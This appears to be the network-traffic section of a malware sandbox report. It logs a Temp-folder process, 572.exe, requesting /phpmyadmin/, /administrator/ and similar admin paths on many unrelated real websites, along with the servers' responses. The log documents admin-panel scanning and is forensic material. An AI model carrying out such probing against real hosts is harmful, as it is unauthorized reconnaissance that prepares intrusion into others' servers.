                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;wp&#45;admin&#47;" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131692&#46;cbdb997</BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
266 | 192.168.2.6 | 56515 | 185.51.191.48 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.420301914 CET | 185 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.722978115 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=a70def476c68db4037c73b8083a0adcb; expires=Tue, 06-Feb-2024 11:14:51 GMT; Max-Age=86400; path=/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; expires=Tue, 06-Feb-2024 11:14:51 GMT; Max-Age=86400
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3362<!DOCTYPE html>... Created by excore - Snake v1.808 - dobos.oliver@nsinfo.hu --><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ogp.me/ns/fb#"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http
Feb 5, 2024 12:14:52.723051071 CET | 1286 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: -equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="stylesheet" href="/sites/default/css/main.css?v=1.808" /><link rel="stylesheet" media=print href="/sites/default/css/print.css?v=1.808" /><link rel="styleshee
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.723064899 CET1286INData Raw: 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 6a 71 75 65 72 79 2e 75 69 2e 65 66 66 65 63 74 2d 66 61 64 65 2e 6d 69 6e 2e 6a 73 22 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script type="text/javascript" src="/js/jquery/ui/jquery.ui.effect-fade.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.datepicker.min.js"></script><script type="text/javascript" src="/js/jquery/jquery.auto
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.723077059 CET1286INData Raw: 66 3d 22 68 74 74 70 3a 2f 2f 69 6e 6e 6f 76 61 74 69 6f 6e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 65 75 2f 70 6c 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: f="http://innovationdevelopment.eu/pl/phpmyadmin/" /><link rel="alternate" hreflang="ro" href="http://innovationdevelopment.eu/ro/phpmyadmin/" /><link rel="alternate" hreflang="sk" href="http://innovationdevelopment.eu/sk/phpmyadmin/" />
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.723088980 CET1286INData Raw: 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 61 6a 61 78 27 29 2e 73 72 63 3d 27 73 69 74 65 73 2f 64 65 66 61 75 6c 74 2f 63 6f 6e 74 65 6e 74 2f 61 6a 61 78 2f 66 62 77 2e 70 68 70 3f 6d 3d 67 79 65 6e 67 65 6e 6c 61 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: cument.getElementById('ajax').src='sites/default/content/ajax/fbw.php?m=gyengenlato'"><img src="/images/fbw.gif" style="max-width:24px;max-height:24px;width:auto;height:auto;" alt="Low vision version" /></a><a href="javascript
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.723103046 CET1286INData Raw: 49 6e 6e 6f 6d 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 67 65 73 2f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 49 6e 6e 6f 6d 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Innome"><img src="images/logo.png" alt="Innome" /></a></div><div class="menu"><a href="/en/ims/what-is-it">IMS</a><a href="/en/project/about">Project</a><a href="/en/outputs/guide">Outputs</a><a href="/en/contact">
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.723115921 CET1286INData Raw: 63 72 65 65 6e 5f 73 69 7a 65 73 2e 70 68 70 3f 77 3d 27 2b 73 63 72 65 65 6e 2e 77 69 64 74 68 2b 27 26 68 3d 27 2b 73 63 72 65 65 6e 2e 68 65 69 67 68 74 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: creen_sizes.php?w='+screen.width+'&h='+screen.height;});</script><div class="LAW_cookie_alert" style="display:block;">By using this site you agree that this site uses cookies.<br><a href="javascript:void();" onClick="LAWsetC
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.723128080 CET1286INData Raw: 20 63 61 6c 6c 65 64 20 61 20 63 6f 6f 6b 69 65 20 28 63 6f 6f 6b 69 65 73 29 20 6d 61 79 20 70 6c 61 63 65 20 64 75 72 69 6e 67 20 74 68 65 20 75 73 65 20 6f 66 20 74 68 65 20 77 65 62 73 69 74 65 20 75 73 65 72 27 73 20 63 6f 6d 70 75 74 65 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: called a cookie (cookies) may place during the use of the website user's computer or mobile device, which is managed by the browser (eg. unique ID, website names, numbers and alphabetical character). <br> <b> types of cookies </ b> <br> Stora
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.723140001 CET1286INData Raw: 73 69 63 20 73 65 74 74 69 6e 67 20 63 6f 6f 6b 69 65 73 2c 20 62 75 74 20 79 6f 75 20 63 61 6e 20 64 69 73 61 62 6c 65 20 74 68 65 6d 20 62 79 20 74 68 65 20 75 73 65 72 2c 20 74 6f 20 72 65 6a 65 63 74 20 69 74 2e 20 3c 62 72 3e 20 64 69 73 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: sic setting cookies, but you can disable them by the user, to reject it. <br> disable the cookies are requested to make the necessary settings on the computer or mobile device Internet browser / browser's settings menu (ban, withdrawal). <br>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.723151922 CET1286INData Raw: 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 74 69 74 6c 65 22 3e 50 61 72 74 6e 65 72 73 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 6c 6f 67 6f 73 22 3e 3c 70 3e 3c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <div class="footer_title">Partners</div><div class="footer_logos"><p><img alt="" src="/ckfinder/userfiles/images/logo_nf.png" style="height:35px; width:91px" /> <img alt="" src="/ckfinder/userfiles/images/TREBAG_nagyon_uj_angol.png
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.740628958 CET830INData Raw: 6f 2e 70 6e 67 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 32 39 70 78 3b 20 77 69 64 74 68 3a 32 39 70 78 22 20 2f 3e 3c 2f 61 3e 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: o.png" style="height:29px; width:29px" /></a></p></div><div class="footer_title">Get the latest information about the project!</div><div class="footer_newsletter"><form action="/en/newsletter" method="POST"><input


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
267 | 192.168.2.6 | 56524 | 77.240.114.212 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.431773901 CET | 173 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: mw.redsa.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.660943031 CET | 437 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:51 GMT
Server: Apache
Location: https://mw.redsa.net/phpmyadmin/
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://mw.redsa.net/phpmyadmin/">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
268 | 192.168.2.6 | 56341 | 13.248.169.48 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.436567068 CET | 179 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: secure.vexcorp.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.767009020 CET | 1190 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 05 Feb 2024 11:14:52 GMT
Content-Type: text/html
Content-Length: 315
Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
Connection: keep-alive
ETag: "65b834fa-13b"
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_IPHdRT2v0DTuQWUIYxcT5Axz2Sc/KAfLwC7kZ/TTT2BOfhmzGY1yScfhhvuOXcK148JYZ46hF9ERhmh8sScRYg
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
Set-Cookie: country=RO;Path=/;Max-Age=86400;
Set-Cookie: city="";Path=/;Max-Age=86400;
Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
Accept-Ranges: bytes
Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
269 | 192.168.2.6 | 56394 | 45.60.74.50 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.454994917 CET | 184 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: zuhauseplus.vodafone.de
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
270 | 192.168.2.6 | 56569 | 190.202.2.80 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.463031054 CET | 191 | OUT | GET /administrator/ HTTP/1.1
Host: contribuyente.seniat.gob.ve
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.632477999 CET | 499 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:52 GMT
Server: Oracle-Application-Server-10g
Location: http://contribuyente.seniat.gob.ve/index.htm
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
Data Ascii: f8 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>301 Moved Permanently</TITLE></HEAD><BODY><H1>Moved Permanently</H1>The document has moved <A HREF="http://contribuyente.seniat.gob.ve/index.htm">here</A>.<P></BODY></HTML>0
Feb 5, 2024 12:14:52.633280039 CET | 186 | OUT | GET /index.htm HTTP/1.1
Host: contribuyente.seniat.gob.ve
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.800512075 CET | 1160 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:14:52 GMT
Server: Oracle-Application-Server-10g
Set-Cookie: HttpOnly;Secure
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'self';
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: no-referrer
Clear-Site-Data: cache
X-Frame-Options: DENY, SAMEORIGIN
Feature-Policy: layout-animations 'none'; unoptimized-images 'none'; oversized-images 'none'; sync-script 'none'; sync-xhr 'none'; unsized-media 'none';
X-XSS-Protection: 1; mode=block
Expect-CT: enforce; max-age=43200
Public-Key-Pins: none
Last-Modified: Mon, 15 May 2023 15:21:36 GMT
ETag: "11fc95-2dd-64624e00"
Accept-Ranges: bytes
Content-Length: 733
Content-Type: text/html
Data Ascii: <HTML>... Created by HTTrack Website Copier/3.47-27 [XR&CO'2013] -->... Mirrored from www.seniat.gob.ve/ by HTTrack Website Copier/3.x [XR&CO'2013], Thu, 16 Jan 2014 04:14:18 GMT -->... Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=iso-8859-1" />... /Added by HTTrack --><HEAD><TITLE>Page has moved</TITLE></HEA
Feb 5, 2024 12:14:52.800630093 CET | 288 | IN |
Data Ascii: D><BODY><META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://declaraciones.seniat.gob.ve"><A HREF="http://declaraciones.seniat.gob.ve"><B>Cargando Portal...</B></A></BODY>... Created by HTTrack Website Copier/3.47-27 [XR&CO'2013] -->
Feb 5, 2024 12:14:52.800666094 CET | 83 | IN |
Data Ascii: Track Website Copier/3.x [XR&CO'2013], Thu, 16 Jan 2014 04:14:18 GMT --></HTML>
Feb 5, 2024 12:14:52.802794933 CET | 255 | OUT | GET /administrator/index.php HTTP/1.1
Host: contribuyente.seniat.gob.ve
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://contribuyente.seniat.gob.ve/index.htm
Feb 5, 2024 12:14:52.969780922 CET | 499 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:52 GMT
Server: Oracle-Application-Server-10g
Location: http://contribuyente.seniat.gob.ve/index.htm
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: f8 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>301 Moved Permanently</TITLE></HEAD><BODY><H1>Moved Permanently</H1>The document has moved <A HREF="http://contribuyente.seniat.gob.ve/index.htm">here</A>.<P></BODY></HTML>0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.970395088 CET241OUTGET /index.htm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: contribuyente.seniat.gob.ve
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://contribuyente.seniat.gob.ve/index.htm
Feb 5, 2024 12:14:53.137547970 CET | 1160 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Oracle-Application-Server-10g
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: HttpOnly;Secure
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self';
                                                                                                                                                                                                                                                                                                                                                                X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                                                                Clear-Site-Data: cache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY, SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Feature-Policy: layout-animations 'none'; unoptimized-images 'none'; oversized-images 'none'; sync-script 'none'; sync-xhr 'none'; unsized-media 'none';
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Expect-CT: enforce; max-age=43200
                                                                                                                                                                                                                                                                                                                                                                Public-Key-Pins: none
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 15 May 2023 15:21:36 GMT
                                                                                                                                                                                                                                                                                                                                                                ETag: "11fc95-2dd-64624e00"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 733
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <HTML>... Created by HTTrack Website Copier/3.47-27 [XR&CO'2013] -->... Mirrored from www.seniat.gob.ve/ by HTTrack Website Copier/3.x [XR&CO'2013], Thu, 16 Jan 2014 04:14:18 GMT -->... Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=iso-8859-1" />... /Added by HTTrack --><HEAD><TITLE>Page has moved</TITLE></HEA
Feb 5, 2024 12:14:53.137558937 CET | 288 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: D><BODY><META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://declaraciones.seniat.gob.ve"><A HREF="http://declaraciones.seniat.gob.ve"><B>Cargando Portal...</B></A></BODY>... Created by HTTrack Website Copier/3.47-27 [XR&CO'2013] -->
Feb 5, 2024 12:14:53.137568951 CET | 83 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Track Website Copier/3.x [XR&CO'2013], Thu, 16 Jan 2014 04:14:18 GMT --></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port
271 | 192.168.2.6 | 56624 | 3.161.150.89 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.533380032 CET | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.637554884 CET | 580 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://account.booking.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 e265f20f047ccdd0006f2da8a274008c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: LL8LDuZPMKR6IM3CGOE576AEsl5wvL53jVuI8ChKlfAP3KkO5Sk6jw==
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
272 | 192.168.2.6 | 56635 | 54.158.51.60 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.587632895 CET | 179 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.706039906 CET | 582 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-control: no-cache="set-cookie"
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://ucv.blackboard.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB744A830D565795711296B8A4B34F8EFBFA6DDAF7B9110B0A46B575850AB86F0E3E029364A64F3950B0D9546BF4A0B5BE0CC;PATH=/;MAX-AGE=900
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 175
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
273 | 192.168.2.6 | 56638 | 104.21.14.245 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.589788914 CET | 175 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.717502117 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:15:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uHBJFymD2utvH5IoFxvviVDfMMjs%2BO4VuuRlw3LrJiumvQ2ulG0O4bVONnpEC%2FfkkNSfuaiOQJUaev7pEHWA%2BD30J%2F3hfn8884xXOGWzVNJAkGD8nazHUXMN7A4Dlkh5DQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb77098ab129-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
274 | 192.168.2.6 | 56641 | 172.66.40.88 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.593163013 CET | 176 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: warriorplus.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.815274000 CET | 1140 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://warriorplus.com:443/phpmyadmin/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SATZtx%2BNaLJHDWM6NhmtMt1ID0ntZ4ZRnJ%2Bqhvl43Zxc3KJH7YcIeRZeSIeuKaJVc2wqmyTUSVJ00ZQ%2FxXAIGCWwg8mtnVQN5T9KpJwgxXB9tVAoKbjIDuLa%2F86HxMdWIA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abb770cf678d1-ATL
alt-svc: h3=":443"; ma=86400
Data Ascii: 1f3<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317" integrity="sha512-euoFGowhlaLqXsPWQ48qSkBSCFs3DPRyiwVu3FjR96cMPx+Fr+gpWRhIafcHwqwCqWS42RZhIudOvEI+Ckf6MA==" data-cf-beacon='{"rayId":"850abb770cf678d1","version":"2024.2.0","token":"59159b5f6bcc48d1b4295b4ba4ed3b0c"}' crossorigin="anonymous"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
275 | 192.168.2.6 | 56634 | 64.91.249.20 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.597666979 CET | 173 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: chainmine.io
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.741303921 CET | 259 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:52 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-Powered-By: PHP/5.4.16
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Ascii: 18<h1>404: Not Found</h1>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
